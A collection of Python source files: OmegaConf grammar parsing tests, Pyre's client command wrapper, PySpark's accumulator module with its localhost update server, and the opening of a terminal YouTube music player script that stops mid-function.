\{${str}\}", r"Wrong: \{hi\}"), ("str_top_leading_dollars", r"$$${str}", "$$hi"), ("str_top_trailing_dollars", r"${str}$$$$", "hi$$$$"), ("str_top_leading_escapes_1", r"\\\\\${str}", r"\\${str}"), ("str_top_leading_escapes_2", r"\\\\ \${str}", r"\\\\ ${str}"), ("str_top_middle_escapes_1", r"abc\\\\\${str}", r"abc\\${str}"), ("str_top_middle_escapes_2", r"abc\\\\ \${str}", r"abc\\\\ ${str}"), ("str_top_trailing_escapes", r" ${str}\\\ ".strip(), r" hi\\\ ".strip()), ("str_top_concat_interpolations", "${null}${float}", "None1.2"), ("str_top_issue_617", r""" ${test: "hi\\" }"} """, r" hi\"} "), # Whitespaces. 
("ws_toplevel", " \tab ${str} cd ${int}\t", " \tab hi cd 123\t"), # Unmatched braces. ("missing_brace_1", "${test:${str}", GrammarParseError), ("missing_brace_2", "${${test:str}", GrammarParseError), ("extra_brace", "${str}}", "hi}"), ] def parametrize_from( data: List[Tuple[str, str, Any]] ) -> Callable[[Callable[..., Any]], Callable[..., Any]]: """Utility function to create PyTest parameters from the lists above""" return mark.parametrize( ["definition", "expected"], [param(definition, expected, id=key) for key, definition, expected in data], ) class TestOmegaConfGrammar: """ Test most grammar constructs. Each method in this class tests the validity of expressions in a specific setting. For instance, `test_single_element_no_interpolation()` tests the "singleElement" parsing rule on expressions that do not contain interpolations (which allows for faster tests without using any config object). Tests that actually need a config object all re-use the same `BASE_TEST_CFG` config, to avoid creating a new config for each test. """ @parametrize_from(PARAMS_SINGLE_ELEMENT_NO_INTERPOLATION) def test_single_element_no_interpolation( self, definition: str, expected: Any ) -> None: parse_tree, expected_visit = self._parse("singleElement", definition, expected) if parse_tree is None: return # Since there are no interpolations here, we do not need to provide # callbacks to resolve them, and the quoted string callback can simply # be the identity. 
visitor = grammar_visitor.GrammarVisitor( node_interpolation_callback=None, # type: ignore resolver_interpolation_callback=None, # type: ignore memo=None, ) self._visit(lambda: visitor.visit(parse_tree), expected_visit) @parametrize_from(PARAMS_SINGLE_ELEMENT_WITH_INTERPOLATION) def test_single_element_with_resolver( self, restore_resolvers: Any, definition: str, expected: Any ) -> None: parse_tree, expected_visit = self._parse("singleElement", definition, expected) OmegaConf.register_new_resolver("test", self._resolver_test) OmegaConf.register_new_resolver("first", self._resolver_first) OmegaConf.register_new_resolver("ns1.ns2.test", self._resolver_test) self._visit_with_config(parse_tree, expected_visit) @parametrize_from(PARAMS_CONFIG_VALUE) def test_config_value( self, restore_resolvers: Any, definition: str, expected: Any ) -> None: parse_tree, expected_visit = self._parse("configValue", definition, expected) OmegaConf.register_new_resolver("test", self._resolver_test) self._visit_with_config(parse_tree, expected_visit) @parametrize_from( [ ("trailing_comma", "${test:a,b,}", ["a", "b", ""]), ("empty_middle", "${test:a,,b}", ["a", "", "b"]), ("empty_first", "${test:,a,b}", ["", "a", "b"]), ("single_comma", "${test:,}", ["", ""]), ( "mixed_with_ws", "${test: ,a,b,\t,,c, \t \t ,d,, \t}", ["", "a", "b", "", "", "c", "", "d", "", ""], ), ] ) def test_deprecated_empty_args( self, restore_resolvers: Any, definition: str, expected: Any ) -> None: OmegaConf.register_new_resolver("test", self._resolver_test) parse_tree, expected_visit = self._parse("singleElement", definition, expected) with warns( UserWarning, match=re.escape("https://github.com/omry/omegaconf/issues/572") ): self._visit_with_config(parse_tree, expected_visit) def _check_is_same_type(self, value: Any, expected: Any) -> None: """ Helper function to validate that types of `value` and `expected are the same. 
This function assumes that `value == expected` holds, and performs a "deep" comparison of types (= it goes into data structures like dictionaries, lists and tuples). Note that dictionaries being compared must have keys ordered the same way! """ assert type(value) is type(expected) if isinstance(value, (str, int, float)): pass elif isinstance(value, (list, tuple, ListConfig)): for vx, ex in zip(value, expected): self._check_is_same_type(vx, ex) elif isinstance(value, (dict, DictConfig)): for (vk, vv), (ek, ev) in zip(value.items(), expected.items()): assert vk == ek, "dictionaries are not ordered the same" self._check_is_same_type(vk, ek) self._check_is_same_type(vv, ev) elif value is None: assert expected is None else: raise NotImplementedError(type(value)) def _get_expected(self, expected: Any) -> Tuple[Any, Any]: """Obtain the expected result of the parse & visit steps""" if isinstance(expected, tuple): # Outcomes of both the parse and visit steps are provided. assert len(expected) == 2 return expected[0], expected[1] elif expected is GrammarParseError: # If only a `GrammarParseError` is expected, assume it happens in parse step. return expected, None else: # If anything else is provided, assume it is the outcome of the visit step. return None, expected def _get_lexer_mode(self, rule: str) -> str: return {"configValue": "DEFAULT_MODE", "singleElement": "VALUE_MODE"}[rule] def _parse( self, rule: str, definition: str, expected: Any ) -> Tuple[Optional[antlr4.ParserRuleContext], Any]: """ Parse the expression given by `definition`. Return both the parse tree and the expected result when visiting this tree. 
""" def get_tree() -> antlr4.ParserRuleContext: return grammar_parser.parse( value=definition, parser_rule=rule, lexer_mode=self._get_lexer_mode(rule), ) expected_parse, expected_visit = self._get_expected(expected) if expected_parse is None: return get_tree(), expected_visit else: # expected failure on the parse step with raises(expected_parse): get_tree() return None, None def _resolver_first(self, item: Any, *_: Any) -> Any: """Resolver that returns the first element of its first input""" try: return next(iter(item)) except StopIteration: assert False # not supposed to happen in current tests def _resolver_test(self, *args: Any) -> Any: """Resolver that returns the list of its inputs""" return args[0] if len(args) == 1 else list(args) def _visit(self, visit: Callable[[], Any], expected: Any) -> None: """Run the `visit()` function to visit the parse tree and validate the result""" if isinstance(expected, type) and issubclass(expected, Exception): with raises(expected): visit() else: result = visit() if expected is math.nan: # Special case since nan != nan. assert math.isnan(result) else: assert result == expected # We also check types in particular because instances of `Node` are very # good at mimicking their underlying type's behavior, and it is easy to # fail to notice that the result contains nodes when it should not. self._check_is_same_type(result, expected) def _visit_with_config( self, parse_tree: antlr4.ParserRuleContext, expected: Any ) -> None: """Visit the tree using the default config `BASE_TEST_CFG`""" if parse_tree is None: return cfg = BASE_TEST_CFG def visit() -> Any: return _utils._get_value( cfg.resolve_parse_tree( parse_tree, # Create a dummy `AnyNode` (it should not actually be used in these # grammer tests, but `resolve_parse_tree()` requires it). 
node=AnyNode(None, parent=cfg), key=None, parent=cfg, ) ) self._visit(visit, expected) @mark.parametrize( "expression", [ "${foo}", "${foo.bar}", "${a_b.c123}", "${ foo \t}", "x ${ab.cd.ef.gh} y", "$ ${foo} ${bar} ${boz} $", "${foo:bar}", "${foo-bar:bar-foo}", "${foo : bar, baz, boz}", "${foo:bar,0,a-b+c*d/$.%@?|}", r"\${foo}", "${foo.bar:boz}", "${$foo.bar$.x$y}", "${$0.1.2$}", "${0foo}", # getitem syntax "${foo[bar]}", "${foo.bar[baz]}", "${foo[bar].baz}", "${foo[bar].baz[boz]}", "${[foo]}", "${[foo].bar}", "${[foo][bar]}", # relative interpolations "${..foo}", "${..foo.bar}", "${..foo[bar]}", "${..[foo].bar}", ], ) class TestMatchSimpleInterpolationPattern: def test_regex(self, expression: str) -> None: assert grammar_parser.SIMPLE_INTERPOLATION_PATTERN.match(expression) is not None def test_grammar_consistency(self, expression: str) -> None: # The expression should be valid according to the grammar. grammar_parser.parse( value=expression, parser_rule="configValue", lexer_mode="DEFAULT_MODE", ) @mark.parametrize( ("expression", "is_valid_grammar"), [ # Also invalid according to the grammar. ("${.}", False), ("${..}", False), ("${}", False), ("${foo", False), ("${0foo:bar}", False), ("${foo . bar}", False), ("${ns . f:var}", False), ("${$foo:bar}", False), ("${.foo:bar}", False), (r"${foo:\}", False), # Valid according to the grammar but not matched by the regex. 
("${foo.${bar}}", True), ("${foo:${bar}}", True), ("${foo:'hello'}", True), (r"\${foo", True), ], ) class TestDoNotMatchSimpleInterpolationPattern: def test_regex(self, expression: str, is_valid_grammar: bool) -> None: assert grammar_parser.SIMPLE_INTERPOLATION_PATTERN.match(expression) is None def test_grammar_consistency(self, expression: str, is_valid_grammar: bool) -> None: ctx: Any = nullcontext() if is_valid_grammar else raises(GrammarParseError) with ctx: grammar_parser.parse( value=expression, parser_rule="configValue", lexer_mode="DEFAULT_MODE", ) def test_empty_stack() -> None: """ Check that an empty stack during ANTLR parsing raises a `GrammarParseError`. """ with raises(GrammarParseError): grammar_parser.parse("ab}", lexer_mode="VALUE_MODE") @mark.parametrize( ("inter", "key", "expected"), [ # config root # simple param("${dict.bar}", "", 20, id="dict_value"), param("${dict}", "", {"bar": 20}, id="dict_node"), param("${list}", "", [1, 2], id="list_node"), param("${list.0}", "", 1, id="list_value"), # relative param( "${..list}", "dict", [1, 2], id="relative:list_from_dict", ), param("${..list.1}", "dict", 2, id="up_down"), param("${..[list][1]}", "dict", 2, id="up_down_getitem"), ], ) def test_parse_interpolation(inter: Any, key: Any, expected: Any) -> None: cfg = OmegaConf.create( { "dict": {"bar": 20}, "list": [1, 2], }, ) root = OmegaConf.select(cfg, key) tree = grammar_parser.parse( parser_rule="singleElement", value=inter, lexer_mode="VALUE_MODE", ) def callback(inter_key: Any, memo: Optional[Set[int]]) -> Any: assert isinstance(root, Container) ret = root._resolve_node_interpolation(inter_key=inter_key, memo=memo) return ret visitor = grammar_visitor.GrammarVisitor( node_interpolation_callback=callback, resolver_interpolation_callback=None, # type: ignore memo=None, ) ret = visitor.visit(tree) assert ret == expected def test_custom_resolver_param_supported_chars() -> None: supported_chars = r"abc123_:" + UNQUOTED_SPECIAL c = 
OmegaConf.create({"dir1": "${copy:" + supported_chars + "}"}) OmegaConf.register_new_resolver("copy", lambda x: x) assert c.dir1 == supported_chars def test_valid_chars_in_interpolation() -> None: valid_chars = "".join( chr(i) for i in range(33, 128) if chr(i) not in INVALID_CHARS_IN_KEY_NAMES ) cfg_dict = {valid_chars: 123, "inter": f"${{{valid_chars}}}"} cfg = OmegaConf.create(cfg_dict) # Test that we can access the node made of all valid characters, both # directly and through interpolations. assert cfg[valid_chars] == 123 assert cfg.inter == 123 @mark.parametrize("c", list(INVALID_CHARS_IN_KEY_NAMES)) def test_invalid_chars_in_interpolation(c: str) -> None: def create() -> DictConfig: return OmegaConf.create({"invalid": f"${{ab{c}de}}"}) # Test that all invalid characters trigger errors in interpolations. if c in [".", "}"]: # With '.', we try to access `${ab.de}`. # With '}', we try to access `${ab}`. cfg = create() with raises(InterpolationKeyError): cfg.invalid elif c == ":": # With ':', we try to run a resolver `${ab:de}` cfg = create() with raises(UnsupportedInterpolationType): cfg.invalid else: # Other invalid characters should be detected at creation time. with raises(GrammarParseError): create() def test_grammar_cache_is_thread_safe() -> None: """ This test ensures that we can parse strings across multiple threads in parallel. Besides ensuring that the parsing does not hang nor crash, we also verify that the lexer used in each thread is different. """ n_threads = 10 lexer_ids = [] stop = threading.Event() def check_cache_lexer_id() -> None: # Parse a dummy string to make sure the grammar cache is populated # (this also checks that multiple threads can parse in parallel). grammar_parser.parse("foo") # Keep track of the ID of the cached lexer. lexer_ids.append(id(grammar_parser._grammar_cache.data[0])) # Wait until we are done. while not stop.is_set(): time.sleep(0.1) # Launch threads. 
threads = [] for i in range(n_threads): threads.append(threading.Thread(target=check_cache_lexer_id)) threads[-1].start() # Wait until all threads have reported their lexer ID. while len(lexer_ids) < n_threads: time.sleep(0.1) # Terminate threads. stop.set() for thread in threads: thread.join() # Check that each thread used a unique lexer. assert len(set(lexer_ids)) == n_threads
command.py
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

import enum
import logging
import os
import re
import resource
import signal
import subprocess
import threading
from abc import abstractmethod
from typing import List, Set  # noqa

from .. import EnvironmentException, log
from ..filesystem import AnalysisDirectory


LOG = logging.getLogger(__name__)


class ClientException(Exception):
    """Raised when the Pyre client binary fails or exits abnormally."""

    pass


class State(enum.IntEnum):
    """Whether a Pyre server process is currently running."""

    DEAD = 0
    RUNNING = 1


class ExitCode(enum.IntEnum):
    """Exit codes reported by the Pyre binary."""

    SUCCESS = 0
    FOUND_ERRORS = 1
    FAILURE = 2
    # If the process exited due to a signal, this will be the negative signal number.
    SIGSEGV = -signal.SIGSEGV


class Result:
    """Exit code and captured output of one invocation of the Pyre binary."""

    def __init__(self, code, output) -> None:
        self.code = code
        self.output = output

    def check(self) -> None:
        """Raise `ClientException` unless the invocation succeeded."""
        if self.code != ExitCode.SUCCESS:
            description = ":\n{}".format(self.output) if self.output else ""
            if self.code == ExitCode.SIGSEGV:
                description += (
                    "\nThis is a Pyre bug. Please re-run Pyre with --debug "
                    "and provide the output to the developers."
                )
            raise ClientException(
                "Client exited with error code {}{}".format(self.code, description)
            )


class Command:
    """Base class for client commands that wrap an invocation of the Pyre binary.

    Subclasses override `_run()`; callers use `run()` and then `exit_code()`.
    """

    _buffer = []  # type: List[str]
    _call_client_terminated = False  # type: bool
    _exit_code = ExitCode.SUCCESS  # type: ExitCode

    def __init__(
        self, arguments, configuration, analysis_directory: AnalysisDirectory
    ) -> None:
        self._arguments = arguments
        self._configuration = configuration

        self._analysis_directory = analysis_directory
        self._debug = arguments.debug
        self._sequential = arguments.sequential
        self._strict = arguments.strict
        self._run_additional_checks = arguments.run_additional_checks
        self._show_error_traces = arguments.show_error_traces
        self._verbose = arguments.verbose
        self._show_parse_errors = arguments.show_parse_errors
        self._logging_sections = arguments.logging_sections
        self._capable_terminal = arguments.capable_terminal
        self._log_identifier = arguments.log_identifier
        self._logger = arguments.logger or (configuration and configuration.logger)

        self._original_directory = arguments.original_directory
        self._current_directory = arguments.current_directory
        if arguments.local_configuration:
            # A local configuration may be given as a directory or as a file
            # inside that directory; normalize to the directory.
            self._local_root = (
                arguments.local_configuration
                if os.path.isdir(arguments.local_configuration)
                else os.path.dirname(arguments.local_configuration)
            )
        else:
            self._local_root = arguments.original_directory

    def run(self) -> "Command":
        """Execute the command and return `self` for chaining."""
        self._run()
        return self

    def exit_code(self) -> int:
        return self._exit_code

    @abstractmethod
    def _run(self) -> None:
        """Abstract method expected to be overridden by subclasses."""
        pass

    def _flags(self) -> List[str]:
        """Translate the parsed command-line arguments into binary flags."""
        flags = []
        # Consistency: use append() for single flags, extend() for flag pairs.
        if self._debug:
            flags.append("-debug")
        if self._sequential:
            flags.append("-sequential")
        if self._strict:
            flags.append("-strict")
        if self._run_additional_checks:
            flags.append("-run-additional-checks")
        if self._show_error_traces:
            flags.append("-show-error-traces")
        if self._verbose:
            flags.append("-verbose")
        if self._show_parse_errors:
            if self._logging_sections:
                self._logging_sections = self._logging_sections + ",parser"
            else:
                self._logging_sections = "parser"
        if not self._capable_terminal:
            # Disable progress reporting for non-capable terminals.
            # This helps in reducing clutter.
            if self._logging_sections:
                self._logging_sections = self._logging_sections + ",-progress"
            else:
                self._logging_sections = "-progress"
        if self._logging_sections:
            flags.extend(["-logging-sections", self._logging_sections])
        if self._current_directory:
            flags.extend(["-project-root", self._current_directory])
        if self._log_identifier:
            flags.extend(["-log-identifier", self._log_identifier])
        if self._logger:
            flags.extend(["-logger", self._logger])
        return flags

    def _read_stdout(self, stdout) -> None:
        """Collect the binary's standard output into `self._buffer`."""
        self._buffer = []
        for line in stdout:
            self._buffer.append(line.decode())

    def _read_stderr(self, stream, _analysis_directory) -> None:
        """Relay the binary's stderr log output, grouping multi-line entries."""
        buffer = None
        log_pattern = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (\w+) (.*)")
        try:
            for line in stream:
                if self._call_client_terminated:
                    return
                line = line.decode().rstrip()
                match = log_pattern.match(line)
                if match:
                    # A new log entry starts; flush the previous one first.
                    if buffer:
                        buffer.flush()
                    buffer = log.Buffer(
                        section=match.groups()[0], data=[match.groups()[1]]
                    )
                elif buffer:
                    # Continuation line of the current entry.
                    buffer.append(line)
            if buffer:
                buffer.flush()
        except Exception:
            # Deliberately best-effort: stderr relaying must never crash the client.
            pass

    def _call_client(self, command, capture_output: bool = True) -> Result:
        """Run the Pyre binary with `command`, streaming its stderr and
        optionally capturing its stdout; return a `Result`.

        Raises `EnvironmentException` if the analysis directory is missing.
        """
        if not os.path.isdir(self._analysis_directory.get_root()):
            raise EnvironmentException(
                "`{}` is not a link tree.".format(self._analysis_directory.get_root())
            )

        client_command = [self._configuration.binary, command]
        client_command.extend(self._flags())
        client_command.append(self._analysis_directory.get_root())

        def limit_memory_usage():
            # Cap the child's address space so a runaway analysis cannot
            # exhaust the machine.
            try:
                limit = 20 * 1024 * 1024 * 1024  # 20 GB
                resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
            except OSError:
                # Run the process with unlimited memory if the underlying syscall fails.
                pass

        LOG.debug("Running `%s`", " ".join(client_command))
        with subprocess.Popen(
            client_command,
            stdout=subprocess.PIPE if capture_output else None,
            stderr=subprocess.PIPE,
            preexec_fn=limit_memory_usage,
        ) as process:

            # Read stdout output
            if capture_output:
                stdout_reader = threading.Thread(
                    target=self._read_stdout, args=(process.stdout,)
                )
                stdout_reader.daemon = True
                stdout_reader.start()

            # Read the error output and print it.
            self._call_client_terminated = False
            stderr_reader = threading.Thread(
                target=self._read_stderr,
                args=(process.stderr, self._analysis_directory.get_root()),
            )
            stderr_reader.daemon = True
            stderr_reader.start()

            # Wait for the process to finish and clean up.
            process.wait()
            self._call_client_terminated = True
            if capture_output:
                # `stdout_reader` is only created when capturing output, so
                # this join is guarded by the same condition.
                stdout_reader.join()

            # Bug fix: the buffer was previously joined a second time under
            # `process.returncode != 0 and capture_output`, producing the exact
            # same value — the redundant recomputation is removed.
            output = "".join(self._buffer) if capture_output else ""

        return Result(code=process.returncode, output=output)

    def _relative_path(self, path) -> str:
        """Return `path` relative to the directory the user invoked Pyre from."""
        # pyre-fixme: Expected str, got bytes
        return os.path.relpath(path, self._original_directory)

    def _state(self) -> State:
        """Probe the server pid file to determine whether a server is running."""
        pid_path = os.path.join(
            self._analysis_directory.get_root(), ".pyre/server/server.pid"
        )
        try:
            with open(pid_path) as file:
                pid = int(file.read())
                os.kill(pid, 0)  # throws if process is not running
            return State.RUNNING
        except Exception:
            # Missing/corrupt pid file or a dead process all mean "no server".
            return State.DEAD

    def _server_string(self, analysis_directory=None) -> str:
        """Return 'server' or 'servers' for the given analysis directory path."""
        if not analysis_directory:
            analysis_directory = self._analysis_directory.get_root()
        return "server{}".format("" if len(analysis_directory) < 2 else "s")

    def _analysis_directory_string(self) -> str:
        return "`{}`".format(self._analysis_directory.get_root())
accumulators.py
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import sys
import select
import struct
import socketserver as SocketServer
import threading

from pyspark.serializers import read_int, CPickleSerializer

__all__ = ["Accumulator", "AccumulatorParam"]

# Serializer used to read pickled (aid, update) pairs off the update socket.
pickleSer = CPickleSerializer()

# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}


def _deserialize_accumulator(aid, zero_value, accum_param):
    # Reconstruct an accumulator on a worker from its pickled description.
    # Deserialized copies start from the zero value; the driver merges updates.
    from pyspark.accumulators import _accumulatorRegistry

    # If this certain accumulator was deserialized, don't overwrite it.
    if aid in _accumulatorRegistry:
        return _accumulatorRegistry[aid]
    else:
        accum = Accumulator(aid, zero_value, accum_param)
        accum._deserialized = True
        _accumulatorRegistry[aid] = accum
        return accum


class Accumulator:
    """
    A shared variable that can be accumulated, i.e., has a commutative and associative "add"
    operation. Worker tasks on a Spark cluster can add values to an Accumulator with the `+=`
    operator, but only the driver program is allowed to access its value, using `value`.
    Updates from the workers get propagated automatically to the driver program.

    While :class:`SparkContext` supports accumulators for primitive data types like :class:`int` and
    :class:`float`, users can also define accumulators for custom types by providing a custom
    :py:class:`AccumulatorParam` object. Refer to its doctest for an example.

    Examples
    --------
    >>> a = sc.accumulator(1)
    >>> a.value
    1
    >>> a.value = 2
    >>> a.value
    2
    >>> a += 5
    >>> a.value
    7
    >>> sc.accumulator(1.0).value
    1.0
    >>> sc.accumulator(1j).value
    1j
    >>> rdd = sc.parallelize([1,2,3])
    >>> def f(x):
    ...     global a
    ...     a += x
    >>> rdd.foreach(f)
    >>> a.value
    13
    >>> b = sc.accumulator(0)
    >>> def g(x):
    ...     b.add(x)
    >>> rdd.foreach(g)
    >>> b.value
    6
    >>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    Py4JJavaError: ...
    >>> def h(x):
    ...     global a
    ...     a.value = 7
    >>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    Py4JJavaError: ...
    >>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
        ...
    TypeError: ...
    """

    def __init__(self, aid, value, accum_param):
        """Create a new Accumulator with a given initial value and AccumulatorParam object"""
        from pyspark.accumulators import _accumulatorRegistry

        self.aid = aid                    # unique accumulator id
        self.accum_param = accum_param    # defines zero() and addInPlace()
        self._value = value
        self._deserialized = False        # True only on worker-side copies
        _accumulatorRegistry[aid] = self

    def __reduce__(self):
        """Custom serialization; saves the zero value from our AccumulatorParam"""
        param = self.accum_param
        return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))

    @property
    def value(self):
        """Get the accumulator's value; only usable in driver program"""
        if self._deserialized:
            raise RuntimeError("Accumulator.value cannot be accessed inside tasks")
        return self._value

    @value.setter
    def value(self, value):
        """Sets the accumulator's value; only usable in driver program"""
        if self._deserialized:
            raise RuntimeError("Accumulator.value cannot be accessed inside tasks")
        self._value = value

    def add(self, term):
        """Adds a term to this accumulator's value"""
        self._value = self.accum_param.addInPlace(self._value, term)

    def __iadd__(self, term):
        """The += operator; adds a term to this accumulator's value"""
        self.add(term)
        return self

    def __str__(self):
        return str(self._value)

    def __repr__(self):
        return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)


class AccumulatorParam:
    """
    Helper object that defines how to accumulate values of a given type.

    Examples
    --------
    >>> from pyspark.accumulators import AccumulatorParam
    >>> class VectorAccumulatorParam(AccumulatorParam):
    ...     def zero(self, value):
    ...         return [0.0] * len(value)
    ...     def addInPlace(self, val1, val2):
    ...         for i in range(len(val1)):
    ...             val1[i] += val2[i]
    ...         return val1
    >>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
    >>> va.value
    [1.0, 2.0, 3.0]
    >>> def g(x):
    ...     global va
    ...     va += [x] * 3
    >>> rdd = sc.parallelize([1,2,3])
    >>> rdd.foreach(g)
    >>> va.value
    [7.0, 8.0, 9.0]
    """

    def zero(self, value):
        """
        Provide a "zero value" for the type, compatible in dimensions with the
        provided `value` (e.g., a zero vector)
        """
        raise NotImplementedError

    def addInPlace(self, value1, value2):
        """
        Add two values of the accumulator's data type, returning a new value;
        for efficiency, can also update `value1` in place and return it.
        """
        raise NotImplementedError


class AddingAccumulatorParam(AccumulatorParam):
    """
    An AccumulatorParam that uses the + operators to add values. Designed for simple types
    such as integers, floats, and lists. Requires the zero value for the underlying type
    as a parameter.
    """

    def __init__(self, zero_value):
        self.zero_value = zero_value

    def zero(self, value):
        return self.zero_value

    def addInPlace(self, value1, value2):
        value1 += value2
        return value1


# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)


class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
    """
    This handler will keep polling updates from the same socket until the
    server is shutdown.
    """

    def handle(self):
        from pyspark.accumulators import _accumulatorRegistry

        auth_token = self.server.auth_token

        def poll(func):
            # Repeatedly wait for readable data and hand it to `func` until
            # the server is shut down or `func` signals completion.
            while not self.server.server_shutdown:
                # Poll every 1 second for new data -- don't block in case of shutdown.
                r, _, _ = select.select([self.rfile], [], [], 1)
                if self.rfile in r:
                    if func():
                        break

        def accum_updates():
            # Read a batch of pickled (aid, update) pairs and merge each into
            # the local registry; acknowledge with a single byte.
            num_updates = read_int(self.rfile)
            for _ in range(num_updates):
                (aid, update) = pickleSer._read_with_length(self.rfile)
                _accumulatorRegistry[aid] += update
            # Write a byte in acknowledgement
            self.wfile.write(struct.pack("!b", 1))
            return False

        def authenticate_and_accum_updates():
            # One-time handshake: the client must echo the server's auth token
            # before its first batch of updates is accepted.
            received_token = self.rfile.read(len(auth_token))
            if isinstance(received_token, bytes):
                received_token = received_token.decode("utf-8")
            if received_token == auth_token:
                accum_updates()
                # we've authenticated, we can break out of the first loop now
                return True
            else:
                raise ValueError(
                    "The value of the provided token to the AccumulatorServer is not correct."
                )

        # first we keep polling till we've received the authentication token
        poll(authenticate_and_accum_updates)
        # now we've authenticated, don't need to check for the token anymore
        poll(accum_updates)


class AccumulatorServer(SocketServer.TCPServer):
    def __init__(self, server_address, RequestHandlerClass, auth_token):
        SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
        self.auth_token = auth_token

    # NOTE(review): the string below is a no-op statement, not the class
    # docstring, because it follows __init__ — presumably intended as class
    # documentation; consider moving it above __init__.
    """
    A simple TCP server that intercepts shutdown() in order to interrupt our
    continuous polling on the handler.
    """

    # Flag checked by _UpdateRequestHandler.poll() to stop its select loop.
    server_shutdown = False

    def shutdown(self):
        self.server_shutdown = True
        SocketServer.TCPServer.shutdown(self)
        self.server_close()


def _start_update_server(auth_token):
    """Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
    server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token)
    thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
    thread.start()
    return server


if __name__ == "__main__":
    import doctest

    from pyspark.context import SparkContext

    globs = globals().copy()
    # The small batch size here ensures that we see multiple batches,
    # even in these small test examples:
    globs["sc"] = SparkContext("local", "test")
    (failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
    globs["sc"].stop()
    if failure_count:
        sys.exit(-1)
App.py
from Player import Player
from getkey import getkey, keys
import sys
from itertools import cycle
from time import sleep
import threading
import argparse
from colorama import Fore

# ANSI escape sequences used to redraw the terminal in place.
CURSOR_UP_ONE = '\x1b[1A'
ERASE_LINE = '\x1b[2K'

# Cross-thread flags: set to stop the search spinner / info display threads.
QUIT_SEARCH = False
QUIT_DISPLAY = False
# Number of terminal lines currently occupied by the "now playing" panel,
# so they can be erased before the next redraw.
LINE_BUFFER = 0

# Launches chrome with YouTube landing page
yt_music = Player()


def delete_lines(n=1):
    """Erase the last `n` terminal lines by moving the cursor up and clearing each."""
    for _ in range(n):
        sys.stdout.write(CURSOR_UP_ONE)
        sys.stdout.write(ERASE_LINE)


def search_animation():
    """Spin a 'Searching' indicator until QUIT_SEARCH becomes truthy.

    Runs on its own thread; clears the spinner line before returning.
    """
    for _ in cycle(['|', '/', '-', '\\']):
        if QUIT_SEARCH:
            # Clear the spinner line before handing the terminal back.
            sys.stdout.write('\r\033[K')
            sys.stdout.flush()
            return
        print(Fore.LIGHTCYAN_EX + '\rSearching ' + _, end='\r'+ Fore.RESET)
        sleep(0.1)


def display_info():
    """Background thread: redraw the now-playing panel whenever the song changes.

    NOTE(review): when the title is unchanged, `continue` skips the trailing
    sleep, so this loop busy-polls the player — confirm whether a short sleep
    before `continue` was intended.
    """
    new_title = 'Idle'
    while True:
        if QUIT_DISPLAY:
            return
        try:
            title = yt_music.get_song_title()
        except:  # player may not be ready yet; treat any failure as idle
            title = 'Idle'
        if new_title == title:
            continue
        else:
            global LINE_BUFFER
            # Erase the previous panel, then assume a full 13-line redraw.
            delete_lines(LINE_BUFFER)
            LINE_BUFFER = 13
            try:
                # Give the player a moment to populate the playlist.
                sleep(5)
                has_playlist = yt_music.get_playlist()
                if not has_playlist:
                    playlist = 'No playlist associated with this song.'
                    LINE_BUFFER -= 4  # single-line message instead of a track list
                else:
                    playlist = '\n'.join([track for track in has_playlist.values()])
            except:  # playlist lookup failed; fall back to a placeholder
                playlist = 'Idle'
                LINE_BUFFER -= 4
            controls = "New song: s\tPause: o\tNext song: p\tPrev song: i\tQuit: q\nSeek 5 seconds: ←/→\t" \
                       "Volume: ↑/↓\tMute: m\n "
            print((Fore.LIGHTCYAN_EX + f'Now Playing: {Fore.WHITE + title + Fore.RESET}\n\n'+ Fore.RESET) +
                  (Fore.LIGHTCYAN_EX + f'Playlist:\n{Fore.WHITE + playlist + Fore.RESET}\n\n'+ Fore.RESET) +
                  (Fore.LIGHTCYAN_EX + f'Controls:\n{Fore.WHITE + controls + Fore.RESET}\r' + Fore.RESET))
            new_title = title
            sleep(0.1)


def parse_args():
    """
    Parse muCLIar args
    :return: argparse.Namespace with `song` (required) and `config` (flag)
    """
    parser = argparse.ArgumentParser(description='muCLIar - Music from CLI')
    parser.add_argument('-s', '--song', type=str, help='Song name', required=True)
    parser.add_argument('-c', '--config', action='store_true')
    return parser.parse_args()


def application(args):
    """
    Event loop for Player
    :param args: Arguments from command line: song name (required), config (optional)
    :return:
    """
    if args.config:
        res = yt_music.auth()
        if res == 0:
            print('Using stored credentials.')
        else:
            print('Logged in.')

    # Start the panel-redraw thread for the lifetime of the session.
    inf = threading.Thread(target=display_info)
    inf.start()

    global QUIT_SEARCH
    QUIT_SEARCH = False
    anim = threading.Thread(target=search_animation)
    anim.start()
    # search() blocks; its (truthy) result also stops the spinner thread.
    QUIT_SEARCH = yt_music.search(song=args.song)
    anim.join()

    key = ''
